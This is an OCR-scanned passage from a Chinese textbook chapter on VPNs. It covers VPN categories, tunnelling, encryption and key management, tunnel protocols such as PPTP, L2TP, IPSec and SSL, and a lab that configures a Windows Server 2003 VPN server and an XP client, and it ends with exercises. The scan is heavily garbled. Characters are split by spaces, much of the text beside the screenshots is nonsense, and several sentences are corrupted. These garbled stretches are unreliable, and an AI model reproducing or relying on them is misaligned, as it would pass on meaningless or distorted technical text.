新 封装 ,重新 封装 后 的 数据 包 通 过 虚拟 通道 在 公 网 上 传输 。 

(6) 当 数 据 包 到 达 目 标 VPN 设备 时 ,数据 包 被 解 封装 ,数字 签名 被 核对 无 误 后 ,数据 包 
被 解密 。 


9.3.4 VPN 的 分 类 


VPN 按照 服务 类 型 可 以 分 为 企业 内 部 虚拟 网 (Intranet VPN) 企业 扩展 虚拟 网 
(Extranet VPN) 和 远程 访问 虚拟 网 (Access VPN) 这 3 种 类 型 。 

(1) 企业 内 部 虚拟 网 (Intranet VPN) ,又 称 内 联网 VPN , 它 是 企业 的 总 部 与 分 支 机 构 之 
间 通 过 公用 网 络 构建 的 虚拟 专用 网 。 这 是 一 种 网 络 到 网 络 的 以 对 等 方式 连接 起 来 所 组 成 的 
VPN。Intranet VPN 的 安全 性 取决 于 两 个 VPN 服务 器 之 间 的 加 密 和 验证 手段 。 图 9-3 是 
一 个 典型 的 Intranet VPN。 


总 部 LAN VPN 服 务 器 路 由 器 路 由 器 VPN 服 务 器 分支 机 构 LAN 


图 9-3 Intranet VPN 


(2) 企业 扩展 虚拟 网 (Extranet VPN) ,又 称 外 联网 VPN , 它 是 企业 间 发 生 收 购 .兼并 或 
企业 间 建 立 战略 联盟 后 .使 不 同 企业 网 通过 公用 网 络 来 构建 的 虚拟 专用 网 ,如 图 9-4 所 示 。 
它 能 保证 包括 TCP 和 UDP 服务 在 内 的 各 种 应 用 服务 的 安全 ,如 HTTP、FTP、E-mail\ 数 据 
库 的 安全 以 及 一 些 应 用 程序 ,如 Java、ActiveX 的 安全 等 。 

通常 把 Intranet VPN 和 Extranet VPN 统一 称 为 专线 VPN。 


总 部 LAN 。 YPN 服 务 器 防火 寺 


图 9-4 Extranet VPN 
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(3) 远程 访问 虚拟 网 [Access VPN) ,又 称 拨号 VPN, 是 指 企业 员工 或 企业 的 小 分 支 机 
构 通过 公用 网 络 远程 拨号 的 方式 构建 的 虚拟 专用 网 。 典 型 的 远程 访问 VPN 是 用 户 通过 本 
地 的 互联 网 服务 提供 商 (ISP) 登 录 到 互联 网 上 ,并 在 现 有 的 办 公 室 和 公司 内 部 网 之 间 建 立 
一 条 加 密 信 道 ,如 图 9-5 所 示 。 

公司 往往 制定 一 种 “透明 的 访问 策略 ”, 即 使 在 远 处 的 员工 也 能 像 他 们 坐 在 公司 总 部 的 
办 公 室 一 样 自由 地 访问 公司 的 资源 。 为 方便 公司 员工 的 使 用 ,远程 访问 VPN 的 客户 端 应 
尽量 简单 ,同时 考虑 加 密 、 身 份 验证 过 滤 等 方法 的 使 用 。 


加 密 信道 


并 
2 


公共 服务 器 KS 
BG 
HS 
; 盯 移动 用 户 
总 部 LAN ”VPN 服 务 器 防火 墙 


图 9-5 Access VPN 


9.3.5 VPN 的 关键 技术 


目前 ,VPN 主要 采用 4 项 关键 技术 来 保证 安全 ,这 4 项 关键 技术 分 别 是 隧道 技术 
《Tunneling) .加 解密 技术 、 密 钥 管理 技术 .用户 与 设备 身份 认证 技术 。 


1. 隧道 技术 


VPN 是 在 公共 网 络 中 形成 企业 专用 的 链 路 ,为 了 形成 这 样 的 链 路 ,采用 了 所 谓 的 “ 隧 
道 ” 技 术 。 隧 道 技术 是 VPN 的 基本 技术 , 它 是 分 组 封装 的 技术 ,可 以 模仿 点 对 点 连接 技术 ， 
依靠 Internet 服务 提供 商 (ISP) 和 其 他 的 网 络 服务 提供 商 (NSP) 在 公用 网 中 建立 自己 专用 
的 “隧道 ”让 数据 包 通 过 这 条 隧道 传输 。 

隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数 据 的 方法 。 使 用 隧道 
传递 的 数据 可 以 是 其 他 协议 的 数据 帧 或 数据 包 。 隧 道 协议 将 其 他 协议 的 数据 帧 或 数据 包 重 
新 封装 到 一 个 新 的 IP 分 组 的 数据 体 中 ,然后 通过 隧道 发 送 。 新 的 IP 分 组 的 报头 提供 路 由 
信息 ,以 便 通过 互联 网 传递 被 封装 的 负载 数据 。 当 新 的 IP 分 组 到 达 隧 道 终 点 时 ,该 新 的 IP 
分 组 被 解除 封装 。 


2. 加 解密 技术 


发 送 者 在 发 送 数 据 之 前 对 数据 进行 加 密 , 当 数据 到 达 接 收 者 时 由 接收 者 对 数据 进行 解 
密 。 加 密 算 法 主要 包括 对 称 加 密 ( 单 钥 加 密 ) 算 法 和 非 对 称 加 密 ( 双 钥 加 密 ) 算 法 。 对 于 对 称 
加 密 算法 ,通信 双方 共享 一 个 密 钥 ,发 送 方 使 用 该 密 钥 将 明文 加 密 成 密 文 ,接收 方 使 用 相同 
的 密 钥 将 密 文 还 原 成 明文 。 对 称 加 密 算法 运算 速度 较 快 。 

非 对 称 加 密 算法 是 通信 双方 各 使 用 两 个 不 同 的 密 钥 ,一 个 是 只 有 发 送 方 自己 知道 的 密 
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钥 ( 私 钥 , 秘 密 密 钥 ) , 另 一 个 则 是 与 之 对 应 的 可 以 公开 的 密 钥 ( 公 钥 )。 在 通信 过 程 中 ,发 送 
方 用 接收 方 的 公开 密 钥 加 密 数 据 , 并 且 可 以 用 发 送 方 的 私 钥 对 数据 的 某 一 部 分 或 全 部 加 密 ， 
进行 数字 签名 。 接 收 方 接收 到 加 密 数据 后 ,用 自己 的 私 钥 解密 数据 ,并 使 用 发 送 方 的 公开 密 
钥 解 密 数字 签名 ,验证 发 送 方 身 份 。 


3. 密 钥 管理 技术 


密 钥 管理 技术 的 主要 任务 是 使 密 钥 在 公用 网 络 上 安全 地 传递 而 不 被 窃取 。 现 行 密 钥 管 
理 技术 可 分 为 SKIP 与 ISAKMP/OAKLEY 两 种 。 

SKIP 主要 是 利用 Diffie-Hellman 的 演算 法 则 在 网 络 上 传输 密 钥 ;在 ISAKMP 中 ,双方 
都 有 两 把 密 钥 ,分 别 作 为 公 钥 和 私 钥 。 


4. 用 户 与 设备 身份 认证 技术 
用 户 与 设备 身份 认证 技术 中 ,最 常用 的 是 用 户 名 /口令 .智能卡 认证 等 认证 技术 。 


9.3.6 VPN 隧道 协议 


VPN 隧道 协议 主要 分 为 第 二 第 三 层 隧道 协议 。 它 们 的 本 质 区 别 在 于 用 户 的 数据 是 被 
封装 在 不 同 层 的 数据 包 中 在 隧道 里 传输 。 第 二 层 隧道 协议 是 先 把 各 种 网 络 协议 封装 到 
PPP( 点 对 点 协议 ) 中 ,再 把 整个 数据 包装 入 隧道 协议 中 。 这 种 双 层 封装 方法 形成 的 数据 包 
靠 第 二 层 协议 进行 传输 。 第 二 层 隧 道 协 议 有 L2F、PPTP、L2TP 等 。 第 三 层 隧 道 协议 是 把 
各 种 网 络 协 议 直 接 装 入 隧道 协议 中 ,形成 的 数据 包 依靠 第 三 层 协议 进行 传输 。 第 三 层 隧 道 
协议 有 IPSec、GRE 等 。 

(1) PPTP( 点 到 点 隧道 协议 )。PPTP 是 由 微软 公司 设计 的 ,用 于 将 PPP 分 组 通过 IP 
网 络 进行 封装 传输 。 设 计 PPTP 协议 的 日 的 是 为 了 满足 公司 内 部 职员 异地 办 公 的 需要 。 
PPTP 协议 定义 了 一 种 PPP 分 组 的 封装 机 制 , 它 通 过 使 用 扩展 的 通用 路 由 封装 协议 GRE 
进行 封装 ,使 PPP 分 组 在 IP 网络 上 进行 传输 。 它 在 逻辑 上 延伸 了 PPP 会 话 , 从 而 形成 了 虚 
拟 的 远程 拨号 。 

(2) L2F( 第 二 层 转 发 )。L2F 是 由 Cisco 公司 提出 的 ,可 以 在 多 种 公共 网 络 设施 (如 
ATM.、 帧 中 继 、IP 网 络 ) 上 建立 多 协议 的 安全 虚拟 专用 网 。 它 将 链 路 层 的 协议 (如 PPP、 
HDLC 等 ) 封 装 起 来 传送 ,因此 网 络 的 链 路 层 完 全 独立 于 用 户 的 链 路 层 协议 。 

(3) L2TP( 第 二 层 隧道 协议 )。L2TP 结合 了 PPTP 协议 和 L2F 协议 的 优点 ,以 便 扩展 
功能 。 其 格式 基于 L2F, 信 令 基 于 PPTP。 这 种 协议 几乎 能 实现 PPTP 和 L2F 协议 能 实现 
的 所 有 服务 ,并 且 更 加 强大 ,灵活 。 它 定义 了 利用 公共 网 络 设施 (如 ATM、 帧 中 继 、IP 网 络 ) 
封装 传输 链 路 层 PPP 帧 的 方法 。 

(4) IPSec(IP 安全 )。IPSec 是 在 网 络 层 提供 通信 安全 的 一 组 协议 。 在 IPSec 协议 族 
中 ,有 两 个 主要 的 协议 :认证 报头 (Authentication Header, AH) 协 议和 封装 安全 负载 
(Encapsulating Security Payload,.ESP) 协 议 。 

对 于 AH 和 ESP 协议 , 源 主机 在 向 目的 主机 发 送 安全 数据 报 之 前 , 源 主 机 和 目的 主机 
进行 握手 ,并 建立 一 个 网 络 层 逻 辑 连 接 , 这 个 逻辑 连接 称 为 安全 关联 (Security Association , 
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SA) 。SA 是 两 个 端点 之 间 的 单 向 连接 , 它 有 一 个 与 之 关联 的 安全 标识 符 。 如 果 需 要 使 用 双 
向 的 安全 通信 , 则 要 求 使 用 两 个 安全 关联 。 

AH 协议 :在 发 送 数据 报时 ,AH 报头 插 在 原 有 IP 数据 报 数据 和 IP 报 文 头 之 间 。 在 IP 
报 文 头 的 协议 类 型 字段 , 值 51 用 来 表明 数据 报 包含 AH 报头 。 当 目的 主机 接收 到 带 有 AH 
报头 的 IP 数据 报 后 , 它 确定 数据 报 的 SA, 并 验证 数据 报 的 完整 性 。AH 协议 提供 了 身份 认 
证 和 数据 完整 性 校 验 功能 ,但 是 没有 提供 数据 加 密 功能 。 

ESP 协议 :采用 ESP 协议 , 源 主机 可 以 向 目的 主机 发 送 安全 数据 报 。 安 全 数据 报 是 用 
ESP 报头 和 ESP 报 尾 来 封装 原来 的 IP 数据 报 ,然后 将 封装 后 的 数据 插入 到 一 个 新 IP 数据 
报 的 数据 字段 。 对 于 这 个 新 IP 数据 报 的 报头 中 的 协议 类 型 字段 , 值 50 用 来 表示 数据 报 包 
含 ESP 报头 和 ESP 报 尾 。ESP 协议 提供 了 身份 认证 .数据 完整 性 校 验 和 数据 加 密 功 能 。 

(5) GRE(General Routing Encapsulation ,通用 路 由 封装 )。GRE 规定 了 怎样 用 一 种 网 
络 层 协议 去 封装 另 一 种 网 络 层 协议 的 方法 。GRE 的 隧道 由 两 端的 源 IP 地 址 和 目的 IP 地 
址 来 定义 。GRE 只 提供 了 数据 包 的 封装 , 它 并 没有 加 密 功 能 来 防止 网 络 侦 听 和 攻击 。 所 
以 ,在 实际 环境 中 它 常 和 IPSec 一 起 使 用 ,由 IPSec 提供 用 户 数 据 的 加 密 , 从 而 给 用 户 提供 
更 好 的 安全 性 。 

(6) SSL(Security Socket Layer, 安全套 接 层 )。SSL 是 由 Netscape 公司 开发 的 一 套 
Internet 数据 安全 协议 ,SSL 内 赃 在 下 等 浏览 器 中 。 它 已 被 广泛 地 用 于 Web 浏览 器 与 服 
务 器 之 间 的 身份 认证 和 加 密 数 据 传输 。SSL 协议 位 于 传输 层 和 应 用 层 之 间 的 一 个 新 层 , 它 
接受 来 自 浏 览 器 的 请 求 , 再 将 请 求 转送 给 TCP 以 便 传输 到 服务 器 上 。 在 SSL 之 上 使 用 的 
HTTP 被 称 为 HTTPS( 安 全 的 HTTP, 使 用 443 端口 .而 非 80 端口 )。SSL 包括 两 个 子 协 
议 :SSL 记录 协议 和 SSL 握手 协议 。SSL 记录 协议 建立 在 可 靠 的 传输 协议 (如 TCP) 之 上 ， 
为 高 层 协议 提供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 。SSL 握手 协议 建立 在 SSL 记录 
协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双方 进行 身份 认证 .协商 加 密 算法 .交换 加 密 
密 钥 等 。 


94 项 目 实 施 


9.4.1 任务 1: 部 器 一 台 基 本 的 VPN 服务 器 


1. 任务 目标 


能 部 署 一 台 基 本 的 VPN 服务 器 ,使 VPN 客户 机 能 够 通过 VPN 拨号 连接 到 VPN 服务 
器 ,能 访问 服务 器 指定 的 内 容 。 


2. 任务 内 容 


(1) 硬件 连接 。 
(2) TCP/IP 协议 配置 。 
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(3) 关闭 防火 墙 和 ICS 服务 。 
(4) 安装 启用 VPN 服务 器 组 件 。 
(5) 创建 VPN 接 入 用 户 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) Windows Server 2003 双 网 卡 服务 器 1 台 。 
(2) Windows XP 客户 机 1 台 。 

(3) 交换 机 1 台 。 

(4) 直通 网 线 2 根 。 


4. 任务 实施 步骤 


(1) 硬件 连接 

用 两 根 直 通 双 绞 线 分 别 把 服务 器 (连接 外 网 的 网 卡 ) 和 客户 机 连接 到 交换 机 上 ,如 
图 9-6 所 示 。 

(2) TCP/IP 协议 配置 

步骤 1: 配置 服务 器 连接 外 网 的 网 卡 1 的 IP 地 址 为 192. 168. 1. 10, 子 网 掩 码 为 
255. 255. 255. 0; 连 接 内 网 的 网 卡 2 的 IP 地 址 为 192. 168. 3. 10, 子 网 掩 码 为 255. 255. 255. 0; 
配置 客户 机 的 IP 地 址 为 192. 168. 1. 20, 子 网 掩 码 为 255. 255. 255. 0。 

步骤 2: 在 服务 器 和 客户 机 之 间 用 ping 命令 测试 网 络 的 连通 性 。 

(3) 关闭 防火 墙 和 ICS 服务 

要 在 服务 器 上 启用 Windows Server 2003 的 VPN 服务 ,必须 先 关闭 系统 自 带 的 一 些 
服务 。 

步骤 1: 关闭 默认 防火 墙 ,如 图 9-7 所 示 。 


图 9-6 网 络 拓扑 结构 图 9-7 关闭 防火 墙 


步骤 2: 禁用 ICS 服务 ,如 图 9-8 所 示 。 

(4) 安装 启用 VPN 服务 器 组 件 

步骤 1: 选择 “开始 ">" 程序 ”>“ 管 理工 具 ” 一 “路 由 和 远程 访问 ”命令 ,打开 “路 由 和 远 
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程 访 问 "控制 台 ,在 列 出 的 本 地 服务 器 (SERVER) 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “配置 
并 启用 路 由 和 远程 访问 ”命令 ,如 图 9-9 所 示 。 


文理 四 “二 作 由 要 看 咱 帮助 如 
各 || 轿 | 团 日 芳 | 国 困 | PP 
[| 志 


Windows Firewall/Intermet 
omaretion Shrine GCS) 


Co 


mt 
基站 和 办 公关 Pa 二 
本 天 站 以 及 和 区 介 和 和 /了 于 目 入 
[3 时 


Err 
7 J fe | 


图 9-8 关闭 ICS 服务 


文件 中。 挤 作 () 要 看 WD 帮助 0 
史 | 生 | 国 | 光 办 日 | 罗 国 


有 有 门 服务 器 的 配置 
访问 ， 在 “操作 ”到 单 上 单 击 “ 了 配置 并 局 用 路 由 


访问 ， 部 署 方 案 ， 忆 及 疑难 般 答 的 更 多 信息 ， 


图 9-9 启用 路 由 和 远程 访问 


步骤 2: 在 打开 的 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 中 单 击 “ 下 一 步 " 按 钮 ,出 现 
“配置 "界面 ,选择 “远程 访问 (拨号 或 VPN)"” 单 选 按钮 .如 图 9-10 所 示 。 

步骤 3: 单 击 * 下 一 步 按 钮 ,出 现 *“ 远 程 访问 ”界面 .选中 *VPN” 和 * 拨 号 ” 复 选 框 ,如 
图 9-11 所 示 。 

步骤 4: 单 击 “下 一 步 ? 按 钮 ,出现 *VPN 连接 ”界面 ,选择 VPN 接 和 人 端口 ( 即 连接 外 网 的 
网 卡 ) ,在 这 里 选择 IP 地 址 为 192. 168. 1. 10 的 本 地 连接 .如 图 9-12 所 示 。 

步骤 5: 单 击 * 下 一 步 ? 按 钮 .出现 *IP 地 址 指定 ”界面 ,选择 对 远程 客户 端 指派 IP 地 址 
的 方法 ,这 里 选中 “来 自 一 个 指定 的 地 址 范围 ” 单 选 按 钮 .如 图 9-13 所 示 。 
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图 9-10 “配置 "界面 图 9-11 “远程 访问 ”界面 


IF 坟 址 党 定 
你 可 以 轩 闫 对 运程 才 户 演 指 派 IT 地 址 的 方法 


图 9-12 “VPN 连接 界面 图 9-13 “IP 地 址 指定 "界面 


步骤 6: 单 击 * 下 一 步 ? 按 钮 ,出现 “地 址 范围 指定 ”界面 ,如 图 9-14 所 示 。 

步骤 7: 单 击 “ 新 建 "按钮 ,在 打开 的 “新 建 地 址 范围 ”对 话 框 中 ,输入 “起 始 IP 地 址 ”为 
192. 168. 3. 100,“ 结 束 IP 地 址 ”为 192. 168. 3. 199, 共 100 个 地 址 ,如 图 9-15 所 示 。 

步骤 8: 单 击 “ 确 定 ” 按 钮 ,返回 "地址 范围 指定 ”界面 。 再 单 击 "* 下 一 步 ” 按 钮 ,出 现 “ 管 理 
多 个 远程 访问 服务 器 ”界面 ,选中 * 和 否 ,使 用 路 由 和 远程 访问 来 对 连接 请 求 进行 身份 验证 ” 单 
选 按钮 ,如 图 9-16 所 示 。 

步骤 9: 单 击 * 下 一 步 ? 按 钮 ,再 单 击 “ 完 成 ”按钮 。 至 此 ,路 由 和 远程 访问 建立 完成 。 

(5) 创建 VPN 接 人 用 户 

VPN 服务 配置 完成 后 .还 需要 在 VPN 服务 器 上 创建 VPN 接 人 用 户 。 

步骤 1: 右 击 桌面 上 的 “我 的 电脑 图标 ,在 弹出 的 快捷 菜单 中 选择 “管理 ”命令 ,打开 * 计 
算 机 管理 ”窗口 ,依次 展开 “系统 工 具 ” 一 “本 地 用 户 和 组 ”~* 用 户 ” 选 项 ,在 右 侧 窗 格 的 空白 
处 右 击 , 在 弹出 的 快捷 菜单 中 选择 “新 用 户 ” 命 令 . 如 图 9-17 所 示 。 

步骤 2: 在 打开 的 “新 用 户 ” 对 话 框 中 ,输入 用 户 名 (VPNtest) 和 密码 (123456) ,并 选中 
下 方 的 “用 户 不 能 更 改 密 码 ” 和 “密码 永 不 过 期 " 复 选 框 ,如 图 9-18 所 示 。 
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图 9-14 “地 址 范围 指定 ”界面 图 9-15 “新 建 地址 范围 "对话 框 


图 9-16 “管理 多 个 远程 访问 服务 器 "界面 图 9-17 “计算 机 管理 ”窗口 


步骤 3: 单 击 “ 创 建 "按钮 ,再 单 击 “ 关 闭 ” 按 钮 ,完成 新 用 户 VPNtest 的 创建 。 
步骤 4: 在 “计算 机 管理 "窗口 的 右 侧 窗 格 中 , 右 击 刚 创建 的 新 用 户 VPNtest, 在 弹出 的 
快捷 菜单 中 选择 “属性 ”命令 ,打开 “VPNtest 属性 ”对 话 框 ,如 图 9-19 所 示 。 


图 9-18 “新 用 户 ” 对 话 框 图 9-19 设置 远程 访问 权限 为 “允许 访问 ” 
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步骤 5: 选择 “ 拨 入 ”选项 卡 ,选中 “允许 访问 " 单 选 按钮 后 , 单 击 “确定 ”按钮 。 


9.4.2 任务 2: 设 置 VPN 客户 端 


1. 任务 目标 
能 正确 配置 VPN 客户 端 ,并 在 客户 端 拨 号 接 人 VPN 服务 器 。 
2. 任务 内 容 


(1) 设置 客户 端 。 
(2) 实现 VPN 访问 。 


3. 完成 任务 所 需 的 设备 和 软件 
装 有 Windows XP 操作 系统 的 PC 1 台 。 
4. 任务 实施 步骤 


(1) 设置 客户 端 
步骤 1: 在 客户 机 上 , 右 击 桌面 上 的 “网 上 邻居 ”图 标 , 在 弹出 的 快捷 菜单 中 选择 “属性 ” 
命令 ,打开 “网 络 连 接 ” 窗 口 ,如 图 9-20 所 示 。 


Ce 一 个 Wa 入 访 
2 了 


家庭 或 沾 型 办 公 
更 改 findowz 防火 
© 


图 9-20 “网 络 连 接 ” 窗 口 


步骤 2: 单 击 左 侧 窗 格 中 的 “创建 一 个 新 的 连接 ”链接 .打开 “新 建 连接 向 导 ” 对 话 框 。 

步骤 3: 单 击 * 下 一 步 ” 按 钮 ,出 现 “ 网 络 连接 类 型 "界面 ,选中 “连接 到 我 的 工作 场所 的 网 
络 " 单 选 按 钮 ,如 图 9-21 所 示 。 

步骤 4: 单 击 “ 下 一 步 " 按 钮 ,出 现 “ 网 络 连接 ”界面 .选中 “虚拟 专用 网 络 连接 " 单 选 按钮 ， 
如 图 9-22 所 示 。 

步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 连 接 名 "界面 ,输入 连接 名 ,如 tzkj, 如 图 9-23 所 示 。 

步骤 6: 单 击 “ 下 一 步 ?按钮 ,出 现 “*VPN 服务 器 选择 "界面 ,输入 VPN 服务 器 的 IP 地 
址 ,如 192. 168. 1. 10 ,如 图 9-24 所 示 。 
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网 络 连 拥 关 型 
悠 起 难 什么 ? 


〇 连接 到 Tateraet () 
连接 到 Internet ,这样 修 卫 可 以 浏览 Web 或 风电 子 邮件 


〇 设置 家 庭 或 修 型 办 公 网 络 GE) 
连接 一 个 现 有 的 字 放 下 小 型 办 公 同 六 ,或者 设置 一 个 新 的 


口 设 村 高 连 所 ) 
Re 直接 这 接 到 其 他 计算 机 ,或 设置 此 计算 机 使 天 他 
计 项 机 和 与 这 挤 。 


Cs Cm 


图 9-21 “网 络 连 接 类 型 "界面 


新 建 连 失 向 导 
连接 名 
指定 连接 到 你 的 工作 场所 的 连 按 名 称 - 
在 下 面 芭 中 输入 此 这 损 的 名 称 - 
公司 各 的 
[ws 


人 80 ， 称 可 以 输入 您 的 工作 地 点 名 歌 锭 近 玖 服务 器 各。 


图 9-23 “连接 名 ”界面 


局 络 连 扫 
黎 想 要 在 工作 点 如 辣 与 网 络 连 接 ? 


人 下列 时 按 


口 接 号 连接 四 ) 
桥接 ， 到 表 过 迷人 业务 由 于 同 C500 电话 过 


图 9-22 “网 络 连接 ”界面 


TYP 服务 各 先天 
VPS 服务 阐 的 各 称职 地 址 是 什么 ? 


入 入 作 正 演 扩 的 + 算 机 的 主机 名 到 IT 地 址 。 


主机 各 或 ?地 址 G990 ,nierosoft com 或 157 54 0 1) 0 
[TID 


图 9-24 “VPN 服务 器 选择 ”界面 


步骤 7: 单 击 “ 下 一 步 ” 按 钮 .出 现 “ 正 在 完成 新 建 连接 向 导 ” 界 面 .选中 “在 我 的 桌面 上 添 
加 一 个 到 此 连接 的 快捷 方式 ” 复 选 框 ,如 图 9-25 所 示 。 单 击 “ 完 成 ”按钮 。 


正在 完成 新 建 连接 向 导 


和 已 成 功 完成 他 建 下 于 接 需要 的 上 下 


ag 
* 与 此 汗 算 机 上 的 所 有 用 户 失 训 


本 接 格 被 存 入 “ 同 络 连接 ”文件 亚 。 


KESw LR] Ca 


图 9-25 “正在 完成 新 建 连接 向 导 ” 界 面 


(2) 实现 VPN 访问 


步骤 1: 双击 桌面 上 的 tzkj 快捷 方式 图 标 , 打 开 “ 连 接 tzkj” 对 话 框 ,如 图 9-26 所 示 。 
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步骤 2: 输入 用 户 名 (VPNtest) 和 密码 (123456) 后 , 单 击 “ 连 接 ” 按 钮 ,登录 成 功 后 ,会 在 
任务 栏 右 下 角 显 示 VPN 连接 成 功 的 图 标 ,如 图 9-27 所 示 。 


mo | ‘ 记 tzrkj 现在 已 连接 
口 为 下 面 用户 保存 用 户 吉 和 杰 码 G) 单 击 这 里 可 获得 更 详细 的 信息 . .. 


图 9-26 “连接 tzkj” 对 话 框 图 9-27 连接 成 功 


步骤 3: 双击 任务 栏 右 下 角 的 tzkj 联网 图 标 (VPN 连接 ), 打 开 “tzkj 状态 ”对 话 框 ， 
选择 “详细 信息 ”选项 卡 ,如 图 9-28 所 示 。 从 图 中 可 以 知道 ,VPN 服务 器 的 IP 地 址 为 
192. 168 . 3.100, 客 户 端的 IP 地 址 为 192. 168. 3. 101。 之 后 就 可 以 通过 VPN 服务 器 的 IP 
地 址 访问 VPN 服务 器 了 ,就 像 访问 本 地 局 域 网 一 样 。 

步骤 4: 选择 “开始 ”一 “运行 "命令 ,在 打开 的 “运行 ”对话 框 中 输入 VPN 服务 器 的 IP 地 
址 “\\192.168. 3.100”, 如 图 9-29 所 示 。 


[ 委 规 说 细 仿 息 


什 
WAN 沿江 端口 TPTF) 
wn 


加 密 
庄 编 WEFC 

务 器 IF 1 168 3 100 
客户 端 IP 地 址 192. 168.3. 101 


ee 


CC 司 


[mm [em [Ce] 


图 9-28 “tzkj 状态 ”对 话 框 图 9-29 “运行 "对话 框 


步骤 5: 单 击 “ 确 定 ” 按 钮 ,开始 连接 服务 器 ,片刻 之 后 出 现 服务 器 的 共享 文件 夹 , 就 可 像 
访问 本 地 局 域 网 内 的 其 他 计算 机 一 样 访问 VPN 服务 器 的 共享 资源 了 。 

步骤 6: 为 了 使 VPN 拨 通 后 不 影响 客户 机 在 本 地 局 域 网 中 的 使 用 ,在 “网 络 连接 ”窗口 
中 右 击 tzkj 图 标 , 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,如 图 9-30 所 示 。 

步骤 7: 在 打开 的 “tzkj 属性 ”对 话 框 中 .选择 网络” 选项 卡 , 然 后 选中 “Internet 协议 
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全 六 Fan 
和 辟 呈 esp 


全 断 开 比 连 按 

国生 站 各 此 生 拉 
各 坦 看 此 入 报 的 坟 
加 昌 了 此 连接 

国 更 此 连接 的 设 轩 


设 秆 为 职 认 过 搞 吕 ) 
人 副本 CC) 
名 建 快 近 方 式 G) 


图 9-30 “网 络 连接 ”窗口 


步骤 8: 单 击 “ 属 性 ”按钮 ,在 打开 的 对 话 框 中 再 单 击 “ 高 级 ”按钮 .打开 “高 级 TCP/IP 设 
置 ? 对 话 框 , 如 图 9-32 所 示 。 在 “常规 ”选项 卡 中 ,取消 选中 “在 远程 网 络 上 使 用 默认 网 关 ” 复 


加 tzkj 属性 


此 壬 接 使 用 下 列 项 目 @) 

回忆 qes 激 据 包 计划 程序 

出 erosoft 网 络 的 文件 和 打印 机 共享 
回避 Yhware Bridge Protocol 

回 必 icrosoft 网 络 客 P 端 


ED 


描述 
TCP/IP 是 默认 的 三 域 网 协议 。 它 提供 跨 算 多 种 互联 网 
络 的 通信 。 


属性 包 ) 


亡 王 [RN 


图 9-31 “tzkj 属性 "对话 框 


步骤 9: 网 络 管理 员 可 以 在 VPN 服务 器 上 的 “路 由 和 远程 访问 "窗口 中 选择 “远程 访问 


商 级 TCP/IP 设置 


[3 ns ls | 


DE 
En 


图 9-32 “高 级 TCP/IP 设置 "对话 框 


客户 端 " 选 项 ,查看 成 功 拨号 连接 的 客户 ,如 图 9-33 所 示 。 
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曙 车 远程 访问 第 咯 
由 - 回 远程 访问 记录 


图 9-33 查看 已 连接 的 VPN 客户 端 


95 拓展 提高 : IPSec VPN 与 SSL WPN 的 比较 


SSL VPN 作为 一 种 新 兴 的 VPN 技术 ,与 传统 的 IPSec VPN 技术 各 具 特 色 , 各 有 千秋 。 
SSL VPN 比较 适合 用 于 移动 用 户 的 远程 接 入 (ClientSite) ,而 IPSec VPN 则 在 网 对 网 
(Site-Site) 的 VPN 连接 中 具有 先天 优势 。 这 两 种 产品 将 在 VPN 市 场 上 长 期 共存 ,优势 互 
补 。 在 产品 的 表现 形式 上 ,两 者 有 以 下 几 大 差异 。 

(1) SSL VPN 多 用 于 “移动 客户 一 网 "连接 ,IPSec VPN 多 用 于 “网 一 网 ”连接 。SSL 
VPN 的 移动 用 户 使 用 标准 的 浏览 器 ,无 须 安装 客户 端 程序 , 即 可 通过 SSL VPN 隧道 接 入 
内 部 网 络 ;而 IPSec VPN 的 移动 用 户 需 要 安装 专门 的 IPSec 客户 端 软件 。 

(2) SSL VPN 是 基于 应 用 层 的 VPN, 而 IPSec VPN 是 基于 网 络 层 的 VPN。IPSec 
VPN 对 所 有 的 IP 应 用 均 透 明 ;而 SSL VPN 保护 基于 Web 的 应 用 更 有 优势 ,当然 好 的 产品 
也 支持 TCP/UDP 的 C/S 应 用 ,例如 文件 共享 .网 上 邻居 、FTP、Telnet、Oracle 等 。 

(3) SSL VPN 用 户 不 受 上 网 方式 限制 ,SSL VPN 隧道 可 以 穿 透 防火 墙 (Firewall) ; 而 
IPSec 客户 端 需要 支持 “NAT 穿 透 "功能 才能 穿 透 Firewall, 而 且 需 要 Firewall 打开 UDP 
500 端口 。 

(4) SSL VPN 只 需要 维护 中 心 节点 的 网 关 设 备 ,客户 端 免 维护 ,降低 了 部 署 和 支持 费 
用 ;而 IPSec VPN 需要 管理 通信 的 每 个 节点 ,网 管 专业 性 较 强 。 

(5) SSL VPN 更 容易 提供 细 粒 度 访问 控制 ,可 以 对 用 户 的 权限 、 资 源 、 服 务 .文件 进行 
更 加 细致 的 控制 .与 第 三 方 认证 系统 (如 :RADIUS、AD 等 ) 结 合 更 加 便捷 。 而 IPSec VPN 
主要 基于 IP 五 元 组 对 用 户 进行 访问 控制 。 

正 是 出 于 SSL VPN 的 这 些 独 特 优势 ,SSL VPN 越 来 越 被 一 些 客户 所 接受 。 
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96 习 题 
一 、 选 择 题 
1. VPN 主要 采用 4 项 技术 来 保证 安全 ,这 4 项 技术 分 别 是 、 加 解密 技术 、 密 
钥 管 理 技术 、 用 户 与 设备 身份 认证 技术 。 
A. 隧道 技术 B. 代理 技术 C. 防火 墙 技 术 D. 端口 映射 技术 


2. 关于 VPN, 以 下 说 法 错误 的 是 
A. VPN 的 本 质 是 利用 公 网 的 次 源 交 建 企业 的 内 部 私 网 
B. VPN 技术 的 关键 在 于 隧道 的 建立 
C. GRE 是 第 三 层 隧 道 封装 技术 ,把 用 户 的 TCP/UDP 数据 包 直 接 加 上 公 网 的 IP 报 
头发 送 到 公 网 中 去 
D. L2TP 是 第 二 层 隧 道 技术 ,可 以 用 来 构建 VPDN(Virtual Private Dial Network) 


3. IPSec 是 VPN 协议 标准 。 

A. 第 一 层 B. 第 二 层 C. 第 三 层 D. 第 四 层 
4. IPSec 在 任何 通信 开始 之 前 ,要 在 两 个 VPN 结 点 或 网 关 之 间 协商 建立 

A. IP 地 址 B. 协议 类 型 C. 端口 D. 安全 关联 (SA) 
5. 关于 IPSec 的 描述 中 ,错误 的 是 。 


A. 主要 协议 是 AH 协议 与 ESP 协议 B. AH 协议 保证 数据 完整 性 
